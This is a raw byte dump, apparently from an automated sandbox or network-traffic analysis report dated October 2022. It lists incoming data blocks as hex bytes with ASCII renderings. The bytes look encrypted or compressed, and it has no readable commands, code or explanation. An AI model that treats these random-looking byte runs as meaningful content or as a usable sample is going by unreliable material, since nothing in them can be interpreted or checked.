                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21336INData Raw: 5a 7f 85 10 52 c4 02 66 fb 56 32 19 bf d9 e9 41 10 7f 0d ed 4b 84 20 6e 2d 98 ee 0e 47 0f 43 61 86 53 18 1b ad d4 55 67 a4 7b 9a ea c0 22 c0 79 d9 42 17 af ab 15 a0 e0 fd 09 f1 6f 27 31 6e 4b 81 0b 8c a3 a9 b7 49 91 1b b0 8b 3a 10 c1 7d 59 55 7f 83 fa 51 a6 cc f3 8e ac c2 a0 14 7f 94 40 e7 5d b5 dc 32 30 06 de 4d d2 bd 58 fa cf b8 4c c6 6d 9f 7f c0 ba 47 cd 36 d6 70 99 6e 97 81 ba e8 6c 31 da 65 48 cc 90 d9 9a 58 00 93 d5 46 e5 ab f6 ef 1b 19 e2 df 87 d1 90 55 4b 83 50 e7 4d b8 08 65 72 7a f5 c1 2f d3 ed 72 75 3e 9a 12 90 b6 bd b2 e9 d3 46 9a ee 31 5c 7d 2d 9c 1b fb 74 0d 1e 91 45 9e d5 04 bf 5e d1 dc 71 1c 30 84 60 9a f0 a7 c7 31 5c 7d 22 11 02 47 76 07 13 c2 97 33 58 3a 82 d3 3d f1 27 0f 51 7a fa ae 4e 40 8b 66 b1 c2 24 62 5d 11 8b 4c cd ed 66 39 e1 07
                                                                                                                                                                                                                                    Data Ascii: ZRfV2AK n-GCaSUg{"yBo'1nKI:}YUQ@]20MXLmG6pnl1eHXFUKPMerz/ru>F1\}-tE^q0`1\}"Gv3X:='QzN@f$b]Lf9
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21352INData Raw: d7 97 0a b6 0d bf 63 fe 06 b9 e3 26 a8 72 76 40 a2 4c 2b ab 92 6c cf 85 b7 1d ef 8c 16 36 71 c6 6d 4e 48 62 d3 02 12 af 74 6d 52 91 83 7c b5 e4 ac 21 90 b6 95 82 e7 8b 39 b2 3f 73 ea 02 33 bd 57 72 ba c9 e3 82 24 ae 16 fb 01 ef 7b 01 f2 54 f5 68 18 5a d1 ef c8 6c ea 44 dd df 4e 87 9e eb 0a cc 00 ab 23 95 b2 60 6b 4f a6 86 24 2a 9f d7 70 23 04 cb d7 c8 89 a5 aa df 14 c8 8f 8f 72 c5 67 37 9c 55 33 b9 b9 9b 06 2e 76 a3 13 4c 4e 4b 69 dd be ab 73 38 78 96 c0 4c 32 02 53 72 d7 e9 79 d5 82 d0 97 bf 12 47 67 68 ff 4b 07 b2 50 26 83 39 a4 9f 62 26 72 85 0e b5 ec a2 0b 17 68 03 0d ca 48 8b ca fc e7 5b eb 5d 6d 35 1b 9f 89 72 df 3c 5b 0e 51 ee 20 46 82 d7 4b d1 a3 7c cd 76 91 19 81 fb a9 89 29 07 b7 53 22 06 35 9b a2 01 31 48 16 0b 77 1c 0e 9b 90 48 63 cb fb 11 1d
                                                                                                                                                                                                                                    Data Ascii: c&rv@L+l6qmNHbtmR|!9?s3Wr${ThZlDN#`kO$*p#rg7U3.vLNKis8xL2SryGghKP&9b&rhH[]m5r<[Q FK|v)S"51HwHc
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21368INData Raw: 1a cf 5f e8 c3 be 2f 20 ec 14 1f 0a 22 38 6b 67 41 7f 62 dc ce 4a 17 5a ca 11 68 93 a9 36 d4 f9 81 50 9a a4 47 2f 00 90 d6 3b 21 58 5a 0f b3 73 05 1b 00 ea f0 6a 3f 78 cf 52 fe 32 4b 32 9a b5 70 2f 36 5d b2 7b b1 62 33 91 71 e8 7a a9 c6 57 84 40 2d 1a 25 05 e0 35 f5 a3 0d 83 3a 5d 45 cb d2 68 4a 55 05 fc b3 51 f3 c6 f2 fe b1 ac d4 cc a6 06 de 6c 0f 8f 34 0f 67 43 06 cb c8 2c 5f 0e b3 77 dd 5f e6 57 1a 97 0a de 7f f5 6a a0 eb 10 2f 00 5e cb fd 4a 29 00 0e 25 7d d4 fe 7f 4c 17 79 af 96 0f d5 69 93 a9 68 36 84 35 bd 62 22 5d 38 0d cd c4 f7 02 3f 0d 69 1f db 24 03 64 9c 9c 4b f2 bc d6 2e e6 b6 b3 ab f2 1e 34 36 79 a3 e6 76 16 3d 7d 18 e2 8b 49 36 67 fc 9f c7 87 92 a0 0b 24 97 4b f8 33 9b d0 87 50 34 01 b9 52 ff 13 c7 26 44 a3 7b 14 c2 05 22 37 6d 0d 96 d6 7b
                                                                                                                                                                                                                                    Data Ascii: _/ "8kgAbJZh6PG/;!XZsj?xR2K2p/6]{b3qzW@-%5:]EhJUQl4gC,_w_Wj/^J)%}Lyih65b"]8?i$dK.46yv=}I6g$K3P4R&D{"7m{
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21384INData Raw: 5b 50 30 9c 7b df a9 84 42 9b 70 d6 75 a0 21 e6 77 61 51 0f 12 7c e4 87 6c 00 00 bb f6 ce 94 5a 22 cb c1 d1 f7 55 8c 54 81 25 c0 7e c3 3e 59 e9 0e 02 1e f6 43 da 47 34 b8 e9 18 ce e7 e3 d8 23 d7 e5 f8 ac 7e 40 78 5f 0f 0b dd 93 30 f9 f4 51 c8 8a 4f 84 d8 3e 04 b6 d7 18 ee 35 c5 85 48 98 1e 62 4c cf 88 90 c4 bf 21 2c ef ca 71 1b 23 9d e5 a5 7d 56 37 7f e5 bd 40 58 60 00 09 f8 f2 9e 66 83 e2 da 52 12 a9 92 9d 69 d7 2d 75 da 4f ea 41 f0 8c 12 41 b8 06 16 37 a9 9e fa 85 70 89 e5 2b 88 6f 49 e4 95 00 6b d8 b6 2e 3f da 66 dc ff f5 63 e4 96 20 43 93 32 68 1b 3f 91 00 1e a2 37 0c 76 d5 c8 28 16 b8 eb f9 13 9d 2d 7a 1d 67 8f e3 c2 20 a4 a5 00 85 ba 3e 4d c5 f7 e4 fd 82 b9 36 2a 72 be 4f ed 90 2c 09 cc 0b 3e f8 81 6f 79 f8 b1 78 01 73 09 03 ca 0b e1 78 a1 a8 3a 7f
                                                                                                                                                                                                                                    Data Ascii: [P0{Bpu!waQ|lZ"UT%~>YCG4#~@x_0QO>5HbL!,q#}V7@X`fRi-uOAA7p+oIk.?fc C2h?7v(-zg >M6*rO,>oyxsx:
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21400INData Raw: 82 f7 a9 73 b6 c7 98 44 7b 83 fc 5b da 7a db fe f6 80 88 45 dd 7e d9 39 a2 68 00 df 69 23 6f 5b 2e 13 11 46 06 e1 81 07 76 0f d8 07 1a 25 61 2b 53 b3 2e e9 d5 13 4a c7 02 b5 23 0e 3c 36 a4 42 98 65 95 1e 6c 5c ef 8b 7b 5d 3c c7 3d f4 54 19 3b 7e 17 75 d1 d2 45 69 0b 24 63 1f 0e 64 34 e8 41 28 a6 e2 1a e4 8f 0c f2 84 8c 1f 6f 37 52 c4 91 f8 7d fa 6e e3 2a 22 73 b8 15 7d 51 9d 96 25 d2 71 5d 8a ba 7c 20 4c 07 a1 16 b5 a7 28 da 95 1a 69 93 7f ec d1 f3 6b 5a 9a 35 ad d7 ff 74 21 3f cd e3 67 ff 38 4c e8 99 a7 cb d1 34 78 6f d3 2f 68 0a 67 45 9e 92 e0 f1 c8 be 62 86 5a fd 59 aa ce b6 31 c1 e3 45 76 d4 f2 e3 1d d6 1c e3 44 9a d4 ba 69 a5 12 e7 ad ea e4 28 43 cb cf bf 97 26 8c e3 37 9f 05 08 01 f2 da 2d f3 93 fe 17 a1 39 36 33 e2 7a ac 04 12 f7 b3 43 cc 3d b7 ed
                                                                                                                                                                                                                                    Data Ascii: sD{[zE~9hi#o[.Fv%a+S.J#<6Bel\{]<=T;~uEi$cd4A(o7R}n*"s}Q%q]| L(ikZ5t!?g8L4xo/hgEbZY1EvDi(C&7-963zC=
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21416INData Raw: 0f d3 04 bf 2f 3b 56 68 5f b2 3f d2 af 6c 47 4c 8b 01 c6 22 e0 43 61 cd c5 34 ff 14 75 4b 1a 79 9e 42 5b 29 b0 67 ff 24 e0 14 16 48 ea ba fd 92 ba f4 ef d5 3a 36 a6 f6 16 10 68 61 b8 1a 57 ed 81 d0 16 4b d1 c5 70 5e 1c 55 03 b5 3b 6b e5 f7 dd 55 ca 0d a7 c6 3e 5b d5 7b 9e bf 35 4f b4 92 a1 3a 23 29 ee 31 f0 20 76 50 e9 b0 ff bf 5d ca 35 60 5a 76 34 27 f0 00 18 79 8f 0a 5c 0f 9a 11 15 b6 08 a4 d5 f0 5c d8 eb fa 69 08 64 24 26 45 f4 b2 b2 b3 5e bc 0e 92 cb 2b ea ca a9 c1 57 32 77 be 76 32 52 52 59 62 66 c1 a4 f7 62 cc 64 8e 96 b6 8c e2 0e 56 4c cc de e0 e4 52 7c 33 65 91 81 17 b9 1a 07 6f 21 45 fe c8 f1 3e 8d 0e 73 6f 3d bf df e9 f3 fd 35 93 5b 1e 3e 9c 09 57 49 53 58 69 7b 99 94 b8 c3 a7 e4 40 19 7d 4c 90 66 8e ea a0 17 8c 70 b7 03 60 56 b6 30 be 00 a7 30
                                                                                                                                                                                                                                    Data Ascii: /;Vh_?lGL"Ca4uKyB[)g$H:6haWKp^U;kU>[{5O:#)1 vP]5`Zv4'y\\id$&E^+W2wv2RRYbfbdVLR|3eo!E>so=5[>WISXi{@}Lfp`V00
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21432INData Raw: 2b 83 27 b4 b6 95 9d 35 b5 f5 37 ec e2 2d a6 60 1e 91 60 17 0a e4 fb 7e 13 f5 33 c6 10 48 f8 be 38 ee a8 99 ea 00 d9 2c e3 5b 0a e5 ca e4 cd 72 f3 9d e7 d8 9e fd 2d e3 70 96 27 8d c0 ad 70 05 e3 2b 59 3b b6 c9 b5 47 a0 e2 bd a9 5d 46 ef 38 8a 57 9c 55 10 6f 5c 3a 5f 03 b6 8d 0b ce 51 67 97 79 ac fc 20 33 10 ae bb 68 c2 4c 39 3b e9 dc 8f 70 4b 9e 82 4f 30 34 cc dd d5 66 f9 ba d0 c1 9a 99 f8 bd 35 aa 18 f7 4b ef f3 1f f4 b8 3a 76 68 42 b7 e1 1b 66 fe 46 2d 85 d3 a6 ac de 94 c6 35 d7 fb 83 24 de aa 2d 83 2a 0a 4b 93 c5 a4 2b 84 43 c8 68 bb 3d b7 ee 06 e3 77 b9 62 32 64 8a a7 f0 9f a2 f2 22 b8 9f e5 35 c1 f7 20 28 f8 4c 08 6b 1d 14 95 9e ab 5a 14 43 79 64 29 7e b7 d3 54 98 6a f3 bf 3d fb 05 25 b8 83 9d 64 b1 67 14 23 15 00 97 60 bc 8c 2b 99 57 5c 06 62 92 79
                                                                                                                                                                                                                                    Data Ascii: +'57-``~3H8,[r-p'p+Y;G]F8WUo\:_Qgy 3hL9;pKO04f5K:vhBfF-5$-*K+Ch=wb2d"5 (LkZCyd)~Tj=%dg#`+W\by
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21448INData Raw: a9 e0 7e 67 11 7b ed 96 dc c0 12 5f b1 fb 91 7b 14 8f d1 e8 4b 89 72 14 b1 85 15 2a 78 db 22 96 fa 2f f3 2d c0 03 30 d7 b5 dd dc 60 31 65 32 8e a5 c1 af 01 d8 d0 48 53 1a a0 5d fe 48 09 ce c9 e2 fd 08 c5 eb a7 3d 11 6b d3 ca 09 39 9a 0f e7 6c f8 0b 05 db 77 38 a3 5a a9 d4 30 64 bc ef 0d af 01 9b 84 94 dd 37 28 a3 fc c8 ab 14 42 6b 74 29 c2 36 e5 8b 5c d6 76 03 b0 82 e2 a8 18 cb bb fb a4 ca c0 0a d6 3c cf ea 98 c3 61 7f 58 ac 67 26 6f ba 95 93 f7 6f c5 df 6a 9a f3 6d a0 3f f8 32 7f f0 4d 77 1a 91 8e 43 22 85 af 8f 76 d6 44 4b b8 59 ba fe 4c 1e 38 d7 c6 ca 14 3c dd c2 37 26 0a 67 ef aa 96 aa c9 65 03 70 d3 22 a3 c7 5e 3e ba 7a 50 6f 01 56 56 93 0b 25 43 f2 2c 89 db cc 83 26 b7 b8 08 cf 9c c2 16 3c c2 fa 59 86 d1 60 aa e9 8e fc 39 f7 79 78 c5 fa ca 59 b2 75
                                                                                                                                                                                                                                    Data Ascii: ~g{_{Kr*x"/-0`1e2HS]H=k9lw8Z0d7(Bkt)6\v<aXg&oojm?2MwC"vDKYL8<7&gep"^>zPoVV%C,&<Y`9yxYu
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21464INData Raw: 98 a1 37 45 57 9b 97 ae 1c b0 5b bb a6 09 41 dd 26 ea 40 5b 67 b5 34 13 f4 e8 af 88 1d 02 b8 a9 7a c7 a5 3a a0 e9 c5 24 25 ae fd 87 40 81 bb ab 03 87 e9 96 2f 34 da 71 3e 31 c7 48 cb 76 32 5c 7d 6a 63 96 c7 2f 9b 59 64 a6 9a 1b 51 b1 68 64 fe a9 83 e1 3b b5 10 0b 8e 0f bf a6 c2 75 e9 85 dc 60 f8 9c bc 0e 6d 9f d2 64 f9 34 1d e6 f5 c4 d5 43 02 5d eb ce 4f 29 34 b8 7e d6 ad b4 7d f9 ec b5 30 33 02 8c 1e 24 81 3a d5 1d 2b 5a ed 60 eb fe 82 e2 6f 24 aa 9e e0 93 4d 09 36 e8 11 71 de ec 2c b8 25 e1 d5 c8 6b a9 fc 4b 3a d0 fc 66 25 81 99 0a 27 97 47 f1 92 3d d5 35 9d ca 63 e8 d9 e1 5e c5 b4 c9 6d 7b 49 28 b6 03 42 ae e5 68 df 75 2e d6 1b 60 88 6e 3f d7 ce f0 6d f1 21 92 ff f2 72 e7 88 0c b8 8c bd 88 3c bb 22 e1 01 3d c8 d5 12 9d b7 fa 02 13 7f 42 0c b2 ac 66 ab
                                                                                                                                                                                                                                    Data Ascii: 7EW[A&@[g4z:$%@/4q>1Hv2\}jc/YdQhd;u`md4C]O)4~}03$:+Z`o$M6q,%kK:f%'G=5c^m{I(Bhu.`n?m!r<"=Bf
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21480INData Raw: 9a 85 2d ac 61 82 60 07 3a 89 75 4e 57 e4 4d 13 73 6e f5 50 ff 4c 30 d7 06 01 47 2b a9 3e 41 b9 61 a3 ad 82 0f 95 4d b6 b4 b8 5e 5a 8a 6a be 4a 56 f8 f7 4f 0c 96 fd fd a7 3a a5 79 32 6a e3 ab 72 37 67 3d f6 91 ec cc d5 00 c0 be 41 21 28 d3 04 29 8c af b6 04 13 e5 e4 d2 00 30 6d 0d 52 4a e5 ea d6 76 2a 2c 21 9d 70 ec 6b 57 4a 59 46 21 36 b0 d6 4b e7 3f bc 1b bf 2d fc 2e 6a e0 a3 c6 03 5a 43 82 bd 16 bd 63 33 88 09 f7 51 3d a5 93 ec 6d d6 aa 9c b4 93 ba 74 86 9b 49 c2 36 cb 2c 8b 5d 98 3d 49 ae a5 96 42 04 83 ac 25 d1 2d fa 48 39 d8 21 b7 4c e7 3a 72 69 e7 0a b4 17 97 a6 c6 39 8e 5f d5 b4 df a7 0b 49 e8 74 dd 54 f3 90 c4 ab 11 43 6f f2 0a ff 6d f7 76 da b2 23 36 c9 12 31 43 16 98 df 78 ee 67 82 9c 6d a0 b1 89 d4 bf 92 19 ac 17 2d d3 22 f1 0d d5 d2 b1 cc c6
                                                                                                                                                                                                                                    Data Ascii: -a`:uNWMsnPL0G+>AaM^ZjJVO:y2jr7g=A!()0mRJv*,!pkWJYF!6K?-.jZCc3Q=mtI6,]=IB%-H9!L:ri9_ItTComv#61Cxgm-"
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21496INData Raw: be 99 ef c0 f8 06 61 e4 43 00 19 5a 4a 1e 7e 63 ad 16 a3 f8 3a 0b fa 74 12 dc 17 39 0e 0a c2 ac 30 2a df 5f 1b b3 9c c5 21 f1 1f b1 3c 04 5a 81 9f 47 00 2f 3e 50 6f ec 02 58 eb 4e 2c 51 1f b0 ff 57 31 bc 52 d9 9f 42 b8 69 84 a1 19 32 ad 05 cb e8 70 70 d3 0b 67 0c cf 58 71 4c 22 d9 38 a4 1a 67 1d cb 59 6b 84 90 a6 ee b3 31 95 b6 f5 5c 9d b8 98 f3 eb f7 a0 d6 19 86 61 21 81 38 8d 9e d9 b0 2b df af cc 92 b7 c4 f9 8f c2 23 06 87 39 a4 16 0c 53 1b 67 ec 3a 53 cc a2 70 e3 d9 79 4a 0e 2f 0a 02 2e 2a 6b 6c 3f 94 85 57 57 81 39 f7 f2 4b 92 a8 6c ea 32 58 17 76 3e a7 b1 75 aa 17 f9 a3 ff 3b 3c b7 d8 0b 72 bc 73 ad 26 a8 ed 59 74 16 fb fc 41 1c b3 9c 47 fb 14 dd 49 00 03 9e 01 e3 de f4 d7 9f f4 a1 5d 30 b1 8b 6c 6a cf 97 71 44 1e 01 99 2b 30 93 b2 b7 84 72 25 0b c4
                                                                                                                                                                                                                                    Data Ascii: aCZJ~c:t90*_!<ZG/>PoXN,QW1RBi2ppgXqL"8gYk1\a!8+#9Sg:SpyJ/.*kl?WW9Kl2Xv>u;<rs&YtAGI]0ljqD+0r%
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21512INData Raw: 37 97 7b 7d 9c e9 0a 30 9b 2e 78 90 9b 55 5c 39 66 0e af cd 74 5f 71 51 03 d0 10 eb 92 0e 05 eb b0 48 98 de f5 d2 d6 dd b0 af a1 e8 1e 07 fa 2a e1 fa db 33 e5 e6 76 8d 59 7b 76 77 42 4b 24 4b 86 d9 25 0f 1f 20 4c 18 a9 d3 41 34 05 d0 d6 54 ec d3 c0 61 ea 88 2d 8c 6f 8a 83 6f 14 9e 14 6f 1c dd b9 09 8d d9 0f e2 05 5e 60 a2 e8 ed 91 29 07 d0 2a eb 77 08 16 7e 2c 7b 6b 00 50 d6 fa 5e 5d d2 f8 01 6a 91 16 20 16 75 cf 64 a6 e0 6c a1 51 c3 33 ae a7 dd e7 24 c1 e4 c4 08 50 3f 26 28 a7 d9 34 01 40 47 fa 12 25 71 7e 4a d7 7b 67 31 cf d9 da c2 d5 75 00 79 36 1b be a5 b9 c3 b9 b3 5f 93 7c 4f 76 90 c4 e2 47 a6 d1 e0 0b cf ed 3b 4b 94 e2 9d df 32 7b 0e aa db b7 e9 7b 64 27 dc ce 72 4a 54 ef a2 89 dc c5 a5 97 19 fb cf f3 d8 af 1c 36 ec c1 a0 b4 b5 81 4e a2 38 42 b6 43
                                                                                                                                                                                                                                    Data Ascii: 7{}0.xU\9ft_qQH*3vY{vwBK$K% LA4Ta-ooo^`)*w~,{kP^]j udlQ3$P?&(4@G%q~J{g1uy6_|OvG;K2{{d'rJT6N8BC
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21528INData Raw: d8 8b ea 05 cf c4 53 31 0b 97 0b 9e e5 c7 86 5e 53 cc 09 ca e6 72 93 9d 13 29 dc ce 9f ac 83 71 c0 d9 f5 9f 8c 3c d8 a8 97 0d 47 83 2a 31 d2 67 4c 34 7f c7 bf 74 61 d0 39 d9 3f 82 b2 8a 5c a3 bc 9f e6 6a 78 5c 37 16 c6 57 ca 80 1a ad 6f ff 4d 79 3a 80 1a 05 af 6e eb 36 6b 13 a0 82 8c b4 af 0e 7b b7 3f b6 dc d4 c9 b7 41 ea 57 e5 c2 36 ab f0 06 99 2b 30 08 95 c6 53 dd db 7d 70 29 4b 88 27 1b 4d 9b 19 47 46 2b 6f ea cf 7f ce 86 41 05 44 fa 50 c0 32 3a ad d9 88 4f b3 cc 80 07 39 6b de 83 a3 16 f2 5b 0a aa b2 e6 c3 b5 7b 62 a6 54 63 3e f5 db 49 f5 e4 16 47 b7 a5 8c 18 a3 a9 3c 1a db cd 72 10 8b 22 30 be b9 ed 29 f7 9f 49 a8 80 51 38 d1 88 38 d7 6e be 0c 8d f8 ac 74 b4 f3 3a 08 4d d3 46 c6 dc 4f d1 d7 a3 ec 71 19 10 ac 53 00 67 6c 6d 8b c9 2a df cb f7 fb 0e 3d
                                                                                                                                                                                                                                    Data Ascii: S1^Sr)q<G*1gL4ta9?\jx\7WoMy:n6k{?AW6+0S}p)K'MGF+oADP2:O9k[{bTc>IG<r"0)IQ88nt:MFOqSglm*=
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21544INData Raw: bc 39 70 5f 06 1f 15 f6 73 59 d8 d8 af ed f0 c2 a2 13 bb 5f 92 10 e8 da e2 84 88 11 f3 6f a6 f0 b1 f7 70 c4 bc ac 7a 68 08 19 17 d0 b4 9d 18 db df 57 68 b9 ad 5e 94 d1 a1 e8 fd 13 29 8b 6e ca cf 77 5d c6 1e 1c b6 9f c9 38 e8 b0 41 1d a6 33 b8 b7 3c 81 9d 82 3b c0 f8 25 37 20 07 29 57 0c 45 60 d3 e6 07 2a 68 31 f9 bb 17 eb 56 0a dc 16 84 fe 2e 53 ec 62 4e 57 74 a7 f4 59 07 fa 4e 98 ed 18 66 4a da ab 96 fd 04 c6 77 93 aa 56 da 24 eb 4b d7 4d 67 c4 96 07 60 20 87 da 44 65 85 7b c0 77 06 25 1f 29 33 97 65 c6 66 08 72 af d6 76 17 d4 fe 7e 6a 71 11 35 71 f6 ac a9 a5 1a c5 81 aa bd 48 49 2d 6a 84 33 a3 6d 11 aa e3 c3 bb 48 79 b6 dd da 2a fd d5 b3 30 6b c9 4a d9 67 f7 2a 0d 7f 2c cb 8c 53 c6 f0 35 13 2c ac f5 b6 b2 9f 55 b6 25 73 42 45 3d c9 33 68 a4 de 71 8d 83
                                                                                                                                                                                                                                    Data Ascii: 9p_sY_opzhWh^)nw]8A3<;%7 )WE`*h1V.SbNWtYNfJwV$KMg` De{w%)3efrv~jq5qHI-j3mHy*0kJg*,S5,U%sBE=3hq
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21560INData Raw: b3 35 e2 bf 85 6c 35 5e d1 ec 7a 90 90 e8 c0 8e 7e f1 4f 28 46 03 9d 98 75 e4 51 ba c2 c3 12 7c 84 1a 67 89 a9 5b bb c9 a7 6c 5f 2a e7 48 7b b3 3f 8f 3c 78 ef 23 78 0c 97 80 52 8a 62 9f 46 00 e9 34 b5 c3 65 d7 cf 1b fd 1b ed 6e 9e bc 02 e3 8c bb 0b 09 32 b0 2d ce ed 6e e6 da a9 16 fe 57 3f 19 b3 32 e9 c1 8e 63 e3 7a 45 29 a4 00 f9 ba c5 64 3d 21 85 6a cc 2a 92 66 f7 b3 eb 94 57 b9 0e 3d 81 b3 05 12 9e ff 7d b2 27 67 2d 89 8d 14 df a1 59 2e b1 44 89 25 a5 19 b7 a7 f2 37 4d 58 a6 08 23 bd f7 b1 71 0c 97 7d 96 0d cf 59 9b e7 cb 8e d5 15 5e d7 81 6e 83 7d 8b 82 20 b6 a6 4e 42 db 92 f0 a8 6b f1 0f 2b 16 c6 33 39 0f ac 5f 17 aa c9 32 63 6f 94 8c d0 a8 fd 6f 02 c7 45 1b b4 e7 ae 0b 69 66 64 81 7c d1 ae 8f 92 d8 98 00 d1 2b b3 18 37 3b 7c fc 31 ab c1 05 ae 68 e0
                                                                                                                                                                                                                                    Data Ascii: 5l5^z~O(FuQ|g[l_*H{?<x#xRbF4en2-nW?2czE)d=!j*fW=}'g-Y.D%7MX#q}Y^n} NBk+39_2cooEifd|+7;|1h
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21576INData Raw: 9c e3 a2 bc 2a 64 44 47 58 79 26 fd 8a 29 41 e9 ab 03 e6 72 f7 38 43 6b 5e 02 40 db 0d 31 32 56 f3 ad 62 f1 99 0a 49 57 1a 2a 4c c5 77 a5 75 1e 56 e6 d2 6e 6f 9b ae ac 7e ff 4a bc dc 3d f1 ed 31 c3 b8 a8 5e fd 45 ab 71 c2 40 a8 97 ca f5 f4 5f 36 b4 77 4d ed 70 25 98 8b 82 c6 d4 8c a4 f6 58 33 19 e9 f7 13 ea b5 22 ff 99 16 99 93 59 c3 82 9f 1a b3 34 ce 45 5b 2f cd 2d 15 e3 ef fc 73 9a 13 24 77 87 8e 4c 24 40 96 1c c0 e9 28 4d b9 e8 97 3f c3 77 24 05 bf 28 43 24 97 cf f3 5c 68 5d be 93 a0 6d 0d dc aa c7 d1 cd b5 5a 0a 93 47 8e a0 2f b5 9a 25 b3 0c b4 01 11 42 26 e7 5a 42 fe 26 96 71 7b ab 3f 19 b4 09 d5 72 35 cd 91 65 d0 b0 e0 d6 bb 45 30 2d 28 b6 60 84 17 19 f5 96 d1 cc 06 c7 33 f6 ae 42 64 d9 2b 4b 61 c7 39 ed 8c 01 92 6b 6b 22 c8 35 14 85 c6 52 aa 01 42
                                                                                                                                                                                                                                    Data Ascii: *dDGXy&)Ar8Ck^@12VbIW*LwuVno~J=1^Eq@_6wMp%X3"Y4E[/-s$wL$@(M?w$(C$\h]mZG/%B&ZB&q{?r5eE0-(`3Bd+Ka9kk"5RB
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21592INData Raw: bc 6b f4 56 66 4a 12 60 0e 18 52 b8 12 ea e7 99 21 16 a1 d7 ae 60 b4 05 39 58 fb 61 72 1e ce d4 6c 5c cd 39 9e 8a 2f ba 20 73 c8 4d a3 5a 8d 22 7a fa 7c 3c ab 3f 1b 65 f6 01 1e 75 66 8b c8 34 af 3b 3b 5b df de 7c 84 6d 57 79 a7 66 a1 d2 ce ee e2 e7 30 44 97 9b 58 ee c9 07 8b bf b2 09 95 a0 ff a3 b4 43 59 98 6f 51 0e e8 19 b6 e4 3f f9 c2 ce c6 ad 2b 93 46 7a 3e 58 70 6f 1f d8 40 f3 79 4e 53 33 3f 1c 1b b6 bd 8d 3d e9 24 3b 22 00 6a ea a4 f5 42 21 a0 98 4d 5f 9f 9a f5 6c 3b 3e 0f b4 61 74 b2 21 bb dc 55 11 77 1b 15 a3 94 16 d7 a3 d1 9d 27 a6 63 b1 a0 50 25 e8 33 e7 03 3e 85 6a 47 a2 2f 21 71 c0 51 7c f6 f5 86 65 e7 89 af 8c 66 1b 2e 39 e2 32 8c f2 fd 68 36 be 37 55 8c 11 3e 47 c4 7f f9 fc cb a5 fc a9 1b c3 ba e7 e8 a5 c6 02 d8 b2 0c 76 5c a2 a8 41 d8 b3 12
                                                                                                                                                                                                                                    Data Ascii: kVfJ`R!`9Xarl\9/ sMZ"z|<?euf4;;[|mWyf0DXCYoQ?+Fz>Xpo@yNS3?=$;"jB!M_l;>at!Uw'cP%3>jG/!qQ|ef.92h67U>Gv\A
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21608INData Raw: 69 2b a8 d5 5f c0 21 72 45 4c 8e a5 88 76 9b 1d 95 52 47 4f c5 19 33 b1 5e 69 b8 10 c7 c0 f5 35 d0 37 08 37 9d f9 0d 4b 84 dc c2 6d 95 2f 68 37 48 54 1b d1 49 2e 38 56 a0 45 e9 44 07 03 86 d2 82 ce 5f be 8d fe 12 2d e6 b4 fe 02 01 ff f2 cd 65 50 15 f2 32 43 89 2d fa 0e f4 6a 4d 68 6a 34 25 ff 21 d7 a3 c5 f7 46 4e cf 19 97 df 44 29 4b 2c a3 64 3e 45 6a 3d 5d 14 3b 9d 47 c3 8a 07 d8 44 00 34 ca b2 db d8 6e f2 02 de 9f 65 07 37 b3 9b d0 4a a0 06 46 e0 8e e5 8a 90 4d a2 3e ea 04 77 42 b7 d1 81 58 15 cd 4d f5 38 31 eb 21 49 d6 4a 3d 9d 9c 21 5e 99 23 27 eb cd 9d 97 a7 95 fb 0b 39 5d 6d 57 00 f9 89 f6 db 91 0e 29 e2 23 ba 20 5f 71 eb c4 c4 01 73 7d 86 5b 84 b0 7a 40 81 55 1f c0 4e 4a a0 20 9a 36 0f 2e cc 7a 65 b6 33 aa 68 1b f7 d7 3c 48 fa 53 3b 83 33 93 83 2a
                                                                                                                                                                                                                                    Data Ascii: i+_!rELvRGO3^i577Km/h7HTI.8VED_-eP2C-jMhj4%!FND)K,d>Ej=];GD4ne7JFM>wBXM81!IJ=!^#'9]mW)# _qs}[z@UNJ 6.ze3h<HS;3*
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21624INData Raw: 70 c7 f6 e0 f2 91 34 45 0d af 73 c8 18 69 42 29 a2 aa 25 75 4c e0 41 2b f8 fe 6e d6 6c 3f 9b 46 ce e4 4a fb 65 28 68 e9 e3 e1 71 f9 cd 34 c3 19 9f 51 2b 6b de 48 d9 04 8e 00 15 9b 5d 12 0f 86 30 39 17 2f 82 ce 6f fb 55 07 59 41 4d 96 49 16 b7 61 9f b8 a0 b1 44 e6 ca bf 14 e6 89 eb b5 c6 91 6b 9c d4 e3 61 ff 9c fb ac 8f 5d f7 e7 c2 b5 76 c2 f0 5a f9 b0 76 14 de e8 b5 41 3b de c2 9a 75 c5 ed 7c 75 23 c6 44 16 23 dd 2c 1a 14 36 8f fe 6c 9d a7 ed ce 7e b3 3e 74 c2 42 5c 4d e0 27 69 de dc e3 0a 00 8b 50 6b 70 ed e9 20 d1 ea 49 7b 18 d2 73 c3 8f 18 fd d5 d8 a1 37 6c e0 67 5b e0 b4 ff c9 58 c7 7c 27 96 72 fc fe a1 23 54 cc 7d 16 dd 6e 20 95 45 e5 45 8f ad c7 f5 f6 36 32 2a d0 33 6d 7b 55 88 04 c3 b1 fb 5e b5 55 32 95 36 ea 09 82 fd fa ad d8 41 b1 55 22 57 b4 a0
                                                                                                                                                                                                                                    Data Ascii: p4EsiB)%uLA+nl?FJe(hq4Q+kH]09/oUYAMIaDka]vZvA;u|u#D#,6l~>tB\M'iPkp I{s7lg[X|'r#T}n EE62*3m{U^U26AU"W
